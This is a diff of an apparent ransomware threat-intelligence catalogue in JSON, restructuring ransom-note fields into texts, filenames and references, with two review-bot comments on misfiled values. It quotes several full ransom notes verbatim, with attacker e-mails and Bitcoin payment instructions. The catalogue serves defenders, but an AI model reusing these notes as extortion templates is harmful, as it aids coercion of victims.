@@ -3149,24 +3261,28 @@ ], "payment-method": "Email", "ransomnotes": [ - "https://4.bp.blogspot.com/-RGHgroHt5cU/WEUWnFBn2hI/AAAAAAAACYA/zwSf7rmfWdo4ESQ8kjwj6mJrfzL2V22mgCLcB/s1600/note-eng.png", + "WHAT HAPPENED WITH YOUR FILES?\nYour documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\nMore information about the RSA and AES can be found here:\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\nhttp://en.wikipedia.org/wiki/Advanced_Encryption_Standard\nIt mеаns thаt yоu will nоt bе аblе tо аccеss thеm аnуmоrе until thеу аrе dесrуptеd with yоur pеrsоnаl dесrуptiоn kеy! Withоut уоur pеrsоnаl kеy аnd sреciаl sоftwаrе dаtа rеcоvеrу is impоssiblе! If yоu will fоllоw оur instruсtiоns, wе guаrаntее thаt yоu cаn dесryрt аll yоur filеs quiсkly аnd sаfеly!\nIf yоu wаnt tо rеstоrе yоur filеs, plеаsе writе us tо thе е-mаils:\nFiles4463@tuta.io\nFiles4463@protonmail.ch\nFiles4463@gmail.com\nIn subjеct linе оf your mеssаgе writе yоur pеrsоnаl ID:\n4292D68970C047D9\nWе rесоmmеnd yоu tо sеnd yоur mеssаgе ОN ЕАСH оf ОUR 3 ЕМАILS, duе tо thе fасt thаt thе mеssаgе mау nоt rеаch thеir intеndеd rеcipiеnt fоr а vаriеtу оf rеаsоns!\nPlеаsе, writе us in Еnglish оr usе prоfеssiоnаl trаnslаtоr!\nIf yоu wаnt tо rеstоrе yоur filеs, yоu hаvе tо pаy fоr dесrуptiоn in Bitсоins. Thе pricе dереnds оn hоw fаst уоu writе tо us.\nYour message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\nTо cоnfirm thаt wе cаn dесryрt yоur filеs yоu cаn sеnd us up tо 3 filеs fоr frее dесrурtiоn. 
Plеаsе nоte thаt filеs fоr frее dесrурtiоn must NОT cоntаin аnу vаluаblе infоrmаtiоn аnd thеir tоtаl sizе must bе lеss thаn 5Mb.\nYоu hаvе tо rеspоnd аs sооn аs pоssiblе tо еnsurе thе rеstоrаtiоn оf yоur filеs, bеcаusе wе wоnt kееp yоur dеcrуptiоn kеys аt оur sеrvеr mоre thаn оne wееk in intеrеst оf оur sеcuritу.\nNоtе thаt аll thе аttеmpts оf dесryptiоn by yоursеlf оr using third pаrty tооls will rеsult оnly in irrеvосаble lоss оf yоur dаtа.\n\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 6 hours, рlеаsе сhеck SРАМ fоldеr!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 12 hours, рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 24 hours (еvеn if уоu hаvе prеviоuslу rесеivеd аnswеr frоm us), рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе tо еасh оf оur 3 еmаils!\nАnd dоn't fоrgеt tо chеck SPАМ fоldеr!", + "HOW TO RECOVER YOUR FILES INSTRUCTION\nATENTION!!!\nWe are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED \nby our automatic software. It became possible because of bad server security.\nATENTION!!!\nPlease don't worry, we can help you to RESTORE your server to original\nstate and decrypt all your files quickly and safely!\n\nINFORMATION!!!\nFiles are not broken!!!\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!\n* Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\n* Please note that you can recover files only with your unique decryption key, which stored on our side. 
If you will use the help of third parties, you will only add a middleman.\n\nHOW TO RECOVER FILES???\nPlease write us to the e-mail (write on English or use professional translator):\nPabFox@protonmail.com \nFoxHelp@cock.li\nFoxHelp@tutanota.com\nYou have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!\n\nIn subject line write your personal ID:\n[id]\nWe recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \n* Please note that files must not contain any valuable information and their total size must be less than 5Mb. \n\nOUR ADVICE!!!\nPlease be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\n\nWe will definitely reach an agreement ;) !!!" + ], + "ransomnotes-filenames": [ "[5 numbers]-MATRIX-README.RTF", "!ReadMe_To_Decrypt_Files!.rtf", "#Decrypt_Files_ReadMe#.rtf", + "#KOK8_README#.rtf", + "#FOX_README#.rtf", + "!README_GMAN!.rtf", + "#README_EMAN50#.rtf", + "#NOBAD_README#.rtf", + "!ITLOCK_README!.rtf" + ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-RGHgroHt5cU/WEUWnFBn2hI/AAAAAAAACYA/zwSf7rmfWdo4ESQ8kjwj6mJrfzL2V22mgCLcB/s1600/note-eng.png", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/1/ransom-note.jpg", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/1/background.jpg", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/2/wallpaper.jpg", - "WHAT HAPPENED WITH YOUR FILES?\nYour documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\nMore information about the RSA and AES can be found here:\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\nhttp://en.wikipedia.org/wiki/Advanced_Encryption_Standard\nIt mеаns thаt yоu will nоt bе аblе tо аccеss thеm аnуmоrе until thеу аrе 
dесrуptеd with yоur pеrsоnаl dесrуptiоn kеy! Withоut уоur pеrsоnаl kеy аnd sреciаl sоftwаrе dаtа rеcоvеrу is impоssiblе! If yоu will fоllоw оur instruсtiоns, wе guаrаntее thаt yоu cаn dесryрt аll yоur filеs quiсkly аnd sаfеly!\nIf yоu wаnt tо rеstоrе yоur filеs, plеаsе writе us tо thе е-mаils:\nFiles4463@tuta.io\nFiles4463@protonmail.ch\nFiles4463@gmail.com\nIn subjеct linе оf your mеssаgе writе yоur pеrsоnаl ID:\n4292D68970C047D9\nWе rесоmmеnd yоu tо sеnd yоur mеssаgе ОN ЕАСH оf ОUR 3 ЕМАILS, duе tо thе fасt thаt thе mеssаgе mау nоt rеаch thеir intеndеd rеcipiеnt fоr а vаriеtу оf rеаsоns!\nPlеаsе, writе us in Еnglish оr usе prоfеssiоnаl trаnslаtоr!\nIf yоu wаnt tо rеstоrе yоur filеs, yоu hаvе tо pаy fоr dесrуptiоn in Bitсоins. Thе pricе dереnds оn hоw fаst уоu writе tо us.\nYour message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\nTо cоnfirm thаt wе cаn dесryрt yоur filеs yоu cаn sеnd us up tо 3 filеs fоr frее dесrурtiоn. 
Plеаsе nоte thаt filеs fоr frее dесrурtiоn must NОT cоntаin аnу vаluаblе infоrmаtiоn аnd thеir tоtаl sizе must bе lеss thаn 5Mb.\nYоu hаvе tо rеspоnd аs sооn аs pоssiblе tо еnsurе thе rеstоrаtiоn оf yоur filеs, bеcаusе wе wоnt kееp yоur dеcrуptiоn kеys аt оur sеrvеr mоre thаn оne wееk in intеrеst оf оur sеcuritу.\nNоtе thаt аll thе аttеmpts оf dесryptiоn by yоursеlf оr using third pаrty tооls will rеsult оnly in irrеvосаble lоss оf yоur dаtа.\n\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 6 hours, рlеаsе сhеck SРАМ fоldеr!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 12 hours, рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 24 hours (еvеn if уоu hаvе prеviоuslу rесеivеd аnswеr frоm us), рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе tо еасh оf оur 3 еmаils!\nАnd dоn't fоrgеt tо chеck SPАМ fоldеr!", "https://pbs.twimg.com/media/DZ4VCRpWsAYtckw.jpg", "https://pbs.twimg.com/media/DZ4V8uXWsAI0r1v.jpg", - "#KOK8_README#.rtf", - "#FOX_README#.rtf", - "HOW TO RECOVER YOUR FILES INSTRUCTION\nATENTION!!!\nWe are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED \nby our automatic software. It became possible because of bad server security.\nATENTION!!!\nPlease don't worry, we can help you to RESTORE your server to original\nstate and decrypt all your files quickly and safely!\n\nINFORMATION!!!\nFiles are not broken!!!\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! 
You will irrevocably lose all your data!\n* Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\n\nHOW TO RECOVER FILES???\nPlease write us to the e-mail (write on English or use professional translator):\nPabFox@protonmail.com \nFoxHelp@cock.li\nFoxHelp@tutanota.com\nYou have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!\n\nIn subject line write your personal ID:\n[id]\nWe recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \n* Please note that files must not contain any valuable information and their total size must be less than 5Mb. \n\nOUR ADVICE!!!\nPlease be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\n\nWe will definitely reach an agreement ;) !!!", - "!README_GMAN!.rtf", - "#README_EMAN50#.rtf", - "https://pbs.twimg.com/media/Do_pn7bX0AYh1F-.jpg", - "#NOBAD_README#.rtf", - "!ITLOCK_README!.rtf" + "https://pbs.twimg.com/media/Do_pn7bX0AYh1F-.jpg" ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2016-screenlockers-kangaroo-the-sfmta-and-more/", @@ -3199,7 +3315,7 @@ ".locked" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-anaLWyg_iJI/WFaxDs8KI3I/AAAAAAAACro/yGXh3AV-ZpAKmD4fpQbBkAyYXXnkqgR3ACLcB/s1600/note666_2.png" ], "refs": [ 
@@ -3219,10 +3335,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.2",
- "ransomnotes": [
- "https://2.bp.blogspot.com/-D-j_9_LZen0/WEPq4G5w5FI/AAAAAAAACXs/GTnckI3CGYQxuDMPXBzpGXDtarPK8yJ5wCLcB/s1600/note_2.PNG",
+ "ransomnotes-filenames": [
 "Important!.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-D-j_9_LZen0/WEPq4G5w5FI/AAAAAAAACXs/GTnckI3CGYQxuDMPXBzpGXDtarPK8yJ5wCLcB/s1600/note_2.PNG"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html",
 "https://twitter.com/BleepinComputer/status/804810315456200704"
@@ -3240,10 +3358,12 @@
 ".novalid"
 ],
 "payment-method": "Bitcoin - Link WebSite",
- "ransomnotes": [
- "https://3.bp.blogspot.com/-BK_31ORE0ZY/WD284cEVoLI/AAAAAAAACWA/bU0n3MBMD8Mbgzv9bD6VLJb51Q_kr5AJgCLcB/s1600/note.jpg",
+ "ransomnotes-filenames": [
 "RESTORE_CORUPTED_FILES.HTML"
 ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-BK_31ORE0ZY/WD284cEVoLI/AAAAAAAACWA/bU0n3MBMD8Mbgzv9bD6VLJb51Q_kr5AJgCLcB/s1600/note.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html",
 "https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/",
@@ -3275,7 +3395,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-281TI8xvMLo/WDw2Nl72OsI/AAAAAAAACTk/nT_rL0z-Exo93FzoOXnyaFgQ7wPe0r7IgCLcB/s1600/Crypter1.jpg"
 ],
 "refs": [
@@ -3291,7 +3411,7 @@
 "date": "November 2016",
 "encryption": "AES",
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-2dC_gQTed4o/WDxRSh_R-MI/AAAAAAAACT4/yWxzCcMqN_8GLjd8dOPf6Mw16mkbfALawCLcB/s1600/lblMain.png"
 ],
 "refs": [
@@ -3313,7 +3433,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/--45C2Cr8sXc/WDiWLTvW-ZI/AAAAAAAACSA/JnJNRr8Kti0YqSnfhPQBF2rsFf-au1g9ACLcB/s1600/Cockblocke.gif"
 ],
 "refs": [
@@ -3334,7 +3454,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.68096697 (500$)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-nXv88GxxOvQ/WE1gqeD3ViI/AAAAAAAACf4/wcVwQ9Pi_JEP2iWNHoBGmeXKJFsfwmwtwCLcB/s1600/Lomix.png"
 ],
 "refs": [
@@ -3356,10 +3476,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
- "https://2.bp.blogspot.com/-r-vBnl-wLwo/WDg7fHph9BI/AAAAAAAACRc/VuMxWa1nUPIGHCzhCf2AyL_uc7Z9iB6MACLcB/s1600/note_2.PNG",
+ "ransomnotes-filenames": [
 "HOW TO DECRYPT YOU FILES.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-r-vBnl-wLwo/WDg7fHph9BI/AAAAAAAACRc/VuMxWa1nUPIGHCzhCf2AyL_uc7Z9iB6MACLcB/s1600/note_2.PNG"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html",
 "https://decrypter.emsisoft.com/ozozalocker",
@@ -3378,7 +3500,7 @@
 ".mo0n"
 ],
 "payment-method": "WebSite link",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-8-8X7Nd1MYs/WDSZN6NIT1I/AAAAAAAACNg/ltc7ppfZZL0vWn8BV3Mk9BVrdmJbcEnpgCLcB/s1600/222.jpg"
 ],
 "refs": [
@@ -3402,7 +3524,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0,5 - 1,5",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-_i9AjhlvjB8/WDVuLKBnmlI/AAAAAAAACOA/xISXMTBLMbEH4PBS35DQ416woPpkuiVvQCLcB/s1600/note-2.PNG",
 "https://2.bp.blogspot.com/-4HNc9S8SY4I/WBMkpdKyDsI/AAAAAAAAB0I/udESgro7YB4pF98Dv2KrrecyymFGsvV2QCLcB/s1600/note.JPG"
 ],
@@ -3427,7 +3549,7 @@
 ],
 "payment-method": "Call Number",
 "price": "349.99$",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-61DcGSFljUk/WDM2UpFZ02I/AAAAAAAACMw/smvauQCvG3IPHOtEjPP4ocGKmBhVRBv-wCLcB/s1600/lock-note.png"
 ],
 "refs": [
@@ -3450,7 +3572,7 @@
 ".ENCRYPTED"
 ],
 "payment-method": "no ransom",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-RwJ6R-uvYg0/V-qfeRPz7GI/AAAAAAAABi8/7x4MxRP7Jp8edbTJqz4iuEye0q1u5k3pQCLcB/s1600/donald-trump-ransomware.jpg",
 "https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/"
 ],
@@ -3468,7 +3590,7 @@
 "date": "November 2016",
 "encryption": "RSA",
 "payment-method": "CreditCard",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-qJHhbtoL1Y4/V-lOClxieEI/AAAAAAAABis/IbnVAY8hnmEfU8_iU1CgQ3FWeX4YZOkBACLcB/s1600/Nagini.jpg"
 ],
 "refs": [
@@ -3493,7 +3615,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "100$",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-0N1ZUh4WcxQ/WDCfENY1eyI/AAAAAAAACKE/_RVIxRCwedMrD0Tj9o6-ew8u3pL0Y5w8QCLcB/s1600/lock-note2.jpg"
 ],
 "refs": [
@@ -3514,10 +3636,12 @@
 ".DALE"
 ],
 "payment-method": "Tor WebSite",
- "ransomnotes": [
- "https://2.bp.blogspot.com/-OvB9TMJoimE/WC9QXRPFNwI/AAAAAAAACJU/iYcCC9tKvGIu4jH2bd6xLvmO7KMVVCLdgCLcB/s1600/note_2.PNG",
+ "ransomnotes-filenames": [
 "CHIP_FILES.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-OvB9TMJoimE/WC9QXRPFNwI/AAAAAAAACJU/iYcCC9tKvGIu4jH2bd6xLvmO7KMVVCLdgCLcB/s1600/note_2.PNG"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html",
 "http://malware-traffic-analysis.net/2016/11/17/index.html",
@@ -3560,16 +3684,20 @@ ], "payment-method": "Bitcoin - Email", "ransomnotes": [ + "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc", + "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", + "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. 
After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam." + ], + "ransomnotes-filenames": [ "README.txt", "README.jpg", "Info.hta", "FILES ENCRYPTED.txt", "INFO.hta", + "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg", - "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc", - "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. 
The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", - "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com", - "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 
\nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", "https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg", "https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg", "https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg", @@ -3606,7 +3734,7 @@ ], "payment-method": "Bitcoin", "price": "1200€", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-QaJ-Z27tL7s/WDCvwYY2UVI/AAAAAAAACKg/swpf1eKf1Y8oYIK5U8gbfi1H9AQ3Q3r8QCLcB/s1600/angela-merkel.jpg" ], "refs": [ @@ -3628,10 +3756,12 @@ "payment-method": "Bitcoin", "price": "0.7 - 2.1", "ransomnotes": [ - "https://2.bp.blogspot.com/-skwh_-RY50s/WDK2XLhtt3I/AAAAAAAACL0/CaZ0A_fl2Zk-YZYU9g4QCQZkODpicbXpQCLcB/s1600/note_2.PNG", - "https://4.bp.blogspot.com/-tCYSY5fpE5Q/WDLLZssImkI/AAAAAAAACMg/7TmWPW3k4jQuGIYZN_dCxcSGcY_c4po9wCLcB/s1600/note3_2.PNG", "%AppData%\\@WARNING_FILES_ARE_ENCRYPTED.[victim_id].txt." ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-skwh_-RY50s/WDK2XLhtt3I/AAAAAAAACL0/CaZ0A_fl2Zk-YZYU9g4QCQZkODpicbXpQCLcB/s1600/note_2.PNG", + "https://4.bp.blogspot.com/-tCYSY5fpE5Q/WDLLZssImkI/AAAAAAAACMg/7TmWPW3k4jQuGIYZN_dCxcSGcY_c4po9wCLcB/s1600/note3_2.PNG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/", 
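Review bot: In the Dharma entry the new `ransomnotes-filenames` array ends with `"all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com"`, which is a note body and not a filename; its paymentbtc twin a few lines earlier was placed under `ransomnotes`, so this string appears to have been sorted into the wrong array. Move it into `ransomnotes` after the third note and drop it from `ransomnotes-filenames`, so that array holds only the five `README.txt` … `INFO.hta` entries. Any consumer that presumably matches observed file names against `ransomnotes-filenames` would otherwise carry a multi-line string containing an e-mail address as a "filename". The rest of the Dharma object (`value`, `uuid`, the remaining `refs`) lies outside the hunk.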
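Review bot: In the CryptoLuck entry (`@@ -3628,10 +3756,12 @@`) the split is incomplete: the two screenshot URLs move to `ransomnotes-refs`, but the context line `"%AppData%\\@WARNING_FILES_ARE_ENCRYPTED.[victim_id].txt."` stays as the sole element of `ransomnotes`, although it is a file path rather than note text. In the RotorCrypt and MasterBuster hunks of this same patch the equivalent values (`INFO.txt`, `CreatesReadThisFileImportant.txt`) are moved to `ransomnotes-filenames`, so for consistency change the key on the context line to `"ransomnotes-filenames": [`. The trailing `.` after `.txt` looks like a stray character but predates this commit; I would check it against the cited id-ransomware post rather than fix it blind. The enclosing object starts before the hunk.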
@@ -3665,7 +3795,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.2 - 2",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-2fAMkigwn4E/WCs1vKiB9UI/AAAAAAAACIs/_kgk8U9wfisV0MTYInIbArwL8zgLyBDIgCLcB/s1600/note-eng.png"
 ],
 "refs": [
@@ -3692,11 +3822,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
- "https://www.bleepstatic.com/images/news/ransomware/k/karma-ransomware/ransom-note.png",
+ "ransomnotes-filenames": [
 "# DECRYPT MY FILES #.html",
 "# DECRYPT MY FILES #.txt"
 ],
+ "ransomnotes-refs": [
+ "https://www.bleepstatic.com/images/news/ransomware/k/karma-ransomware/ransom-note.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/",
@@ -3716,7 +3848,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-CTLT300bjNk/WCg9mrJArSI/AAAAAAAACGk/weWSqTMVS9AXdxJh_SA06SOH4kh2VGW1gCLcB/s1600/note_2.PNG.png"
 ],
 "refs": [
@@ -3736,7 +3868,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.55 - 0.65",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "Your files are locked !.txt",
 "Your files are locked !!.txt",
 "Your files are locked !!!.txt",
@@ -3767,7 +3899,7 @@
 ".kolobocheg@aol.com_"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.ransomware.wiki/tag/kolobo/"
 ],
 "refs": [
@@ -3792,7 +3924,7 @@
 ],
 "payment-method": "PaySafeCard",
 "price": "100€",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-r2kaNLjBcEk/WCNCqrpHPZI/AAAAAAAACEE/eFSWuu4mUZoDV5AnduGR4KxHlFM--uIzACLcB/s1600/lock-screen.png"
 ],
 "refs": [
@@ -3816,7 +3948,7 @@
 ],
 "payment-method": "Qhvi-wallet / Yandex-wallet",
 "price": "5000 rubles",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-UFksnOoE4Ss/WCRUNbQuqyI/AAAAAAAACFI/Gs3Gkby335UmiddlYWJDkw8O-BBLt-BlQCLcB/s1600/telegram_rans.gif"
 ],
 "refs": [
@@ -3840,7 +3972,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.4",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-ftA6aPEXwPM/WCDY3IiSq6I/AAAAAAAACCU/lnH25navXDkNccw5eQL9fkztRAeIqDYdQCLcB/s1600/note111.png"
 ],
 "refs": [
@@ -3879,7 +4011,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.33",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "HOW_TO_DECRYPT_YOUR_FILES_[random_3_chars].html",
 "HOW_TO_DECRYPT_YOUR_FILES_[random_3_chars].txt"
 ],
@@ -3923,7 +4055,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.03",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/11-4-16/CwZubUHW8AAE4qi[1].jpg"
 ],
 "refs": [
@@ -3944,7 +4076,7 @@
 ".hollycrypt"
 ],
 "payment-method": "Bitcoin Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-PdtXGwSTn24/WBxIoomzF4I/AAAAAAAAB-U/lxTwKWc7T9MJhUtcRMh1mn9m_Ftjox9XwCLcB/s1600/note_2.PNG"
 ],
 "refs": [
@@ -3963,7 +4095,7 @@
 ".BTC"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
